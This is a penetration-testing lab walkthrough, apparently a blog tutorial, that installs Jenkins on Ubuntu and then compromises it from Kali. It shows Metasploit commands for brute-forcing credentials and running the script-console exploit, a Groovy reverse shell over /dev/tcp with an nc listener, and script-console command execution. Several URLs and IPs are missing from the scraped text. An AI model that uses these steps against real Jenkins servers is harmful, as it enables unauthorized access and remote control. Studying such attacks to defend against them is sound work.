Jenkins is an open-source automation server used for continuous integration (CI) and continuous delivery (CD). It's built on Java and utilizes a scripting platform for automation. Jenkins automates tasks such as building, testing, and deployment in the software development lifecycle. This automation accelerates development cycles, enhances code quality, and streamlines releases. Key features include CI/CD pipelines, automated testing, integration with version control systems, extensibility via plugins, and robust monitoring and reporting capabilities.
Table of Contents
· Lab Setup
· Installation
· Configuration
· Enumeration
· Exploitation using
Metasploit Framework
· Exploiting Manually
(Reverse Shell)
· Executing Shell Commands Directly
· Conclusion
Lab Setup
In this article, we are going to
setup the Jenkins server on the ubuntu machine and obtain the remote code
execution. Following are the machines:
Target Machine: Ubuntu (
Attacker Machine: Kali Linux
For Jenkins to function, it
necessitates the Java Runtime Environment (JRE). In this guide, we'll utilize
OpenJDK to establish the Java environment. OpenJDK's development kit
incorporates JRE within its framework.
apt install openjdk-11-jdk
At times, the default Ubuntu
repository may lack the latest Jenkins version. Therefore, it is suggested
opting for the project-maintained repository to access the most recent features
and patches.
To integrate the Jenkins
repository into the Ubuntu system, adhere to the following:
Begin by importing the GPG key to
ensure package integrity.
sudo curl -fsSL
| sudo tee /usr/share/keyrings/jenkins-keyring.asc > /dev/null
Image may be NSFW.
Clik here to view.
Following that, incorporate the
Jenkins repository and append the authentication key to the source list using
the command provided below:
sudo echo deb
binary/ | sudo tee /etc/apt/sources.list.d/jenkins.list > /dev/null
Now we can proceed with the Jenkins installation in the ubuntu
apt install jenkins
After installation is complete, Jenkins can be started using the
following command:
systemctl start Jenkins
Status can be checked using the following command:
systemctl status jenkins
Post installation, Jenkins can be
configured to run smoothly. By checking the service running on port 8080, the
Jenkins server requires an Administrator password.
Password can be obtained by reading the content of the initialAdminPassword
cat /var/lib/Jenkins/secrets/initialAdminPassword
Select the Install suggested plugins to Customize
Jenkins and proceed with the installation.
The final step requires the
creation of First Admin User username and password. Here we are using
the username as raj and password as 123.
Finally, entering the URL to
access the Jenkins Server. The URL can be entered as
as we want to setup the server on the ubuntu machine.
After successfully installing and
configuring the Jenkins server, we can start the exploitation using the kali
machine. Starting with the enumeration, since at port 8080 the Jenkins Server
is running in the ubuntu machine hence checking the port 8080. At port 8080 there
is a Jenkins login page which requires credentials.
Exploitation using Metasploit Framework:
Since the login page requires
credentials, hence we can use the auxiliary available in the Metasploit
framework to check for the valid username and password to login. The auxiliary
which we will be using will require a username file and a password
It can be noted that for CTF
scenarios the username file can be used as the common usernames list ( and password file can be used as rockyou.txt.
However, here we are using a custom dictionary to make the scanning easier. The
following commands can be used inside Metasploit framework:
use auxiliary/scanner/http/Jenkins_login
set rhosts
set rport 8080
set targeturi /
set user_file users.txt
set pass_file passwords.txt
set verbose false
Observe that the username and
password have been enumerated successfully. After the username and password
have been enumerated, now its time use them to exploit the target. The exploit
which can be used here is the exploit/multi/http/Jenkins_script_console.
Following commands can be used inside Metasploit framework to run the exploit:
use exploit/multi/http/Jenkins_script_console
show targets
set target 1
set payload
set rhosts
set rport 8080
set targeturi /
set username raj
set password 123
Observe that the reverse shell has
been obtained after the exploit has been successfully executed.
Exploiting Manually (Reverse
To exploit manually, we require
the username and password of the Jenkins Console. Assuming here that the
attacker has already found the credentials either by brute forcing or through
any other method, successful login into the console can be performed.
After login using the previously
found credentials (raj:123) from the auxiliary. The Manage
Jenkins functionality can be accessed which contains a Script Console
In Jenkins, Groovy serves
as the main scripting language for defining jobs and pipelines. Groovy, being
dynamic and operating on the Java Virtual Machine (JVM), seamlessly integrates
with Jenkins, which is predominantly Java-based. Therefore, we are going to use the groovy
reverse shell script to obtain the reverse shell. The command for the groovy
reverse shell can be obtained from the following URL:
and selecting the Groovy script payload.
Now, using the above groovy
reverse shell script in the Jenkins script console. Before running the script
make sure to start the netcat listener at port 443 inside kali machine using
the following command:
rlwrap nc -lnvp 443
Image may be NSFW.
Clik here to view.
An alternate way to get the reverse shell can be by running the
following script in the script console:
r = Runtime.getRuntime()
p =
r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/;
cat <&5 | while read line; do $line 2>&5 >&5; done"]
as String[])
Make sure to start the listener at
port 443 before running the script.
Observe that the reverse shell is
obtained at port 443 after the execution of the script.
Executing Shell Commands Directly
There are cases where we don’t
have a listener to take the reverse shell. In those cases, we can directly run
the script and obtain the output of the code in the Result window.
The following code is used to get
the output of the system commands:
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'ipconfig'.execute()
proc.consumeProcessOutput(sout, serr)
println "out> $sout err> $serr"
Observe that after running the
script the output can be seen directly in the Result window.
A similar code which can be used
to get the command output in the Result window can be:
def proc = "id".execute();
def os = new StringBuffer();
proc.waitForProcessOutput(os, System.err);
Observe that after running the
script the output can be seen directly in the Result window.
In summary, the possibility of
using Jenkins servers to gain a reverse shell emphasizes the crucial need for
strong security practices. Whether due to compromised logins or no authentication
at all, the vulnerability of Jenkins servers shows why we must take security
seriously. It's essential for organizations to enforce strict access rules,
conduct regular security checks, and promptly update systems to reduce the
chances of unauthorized access and misuse.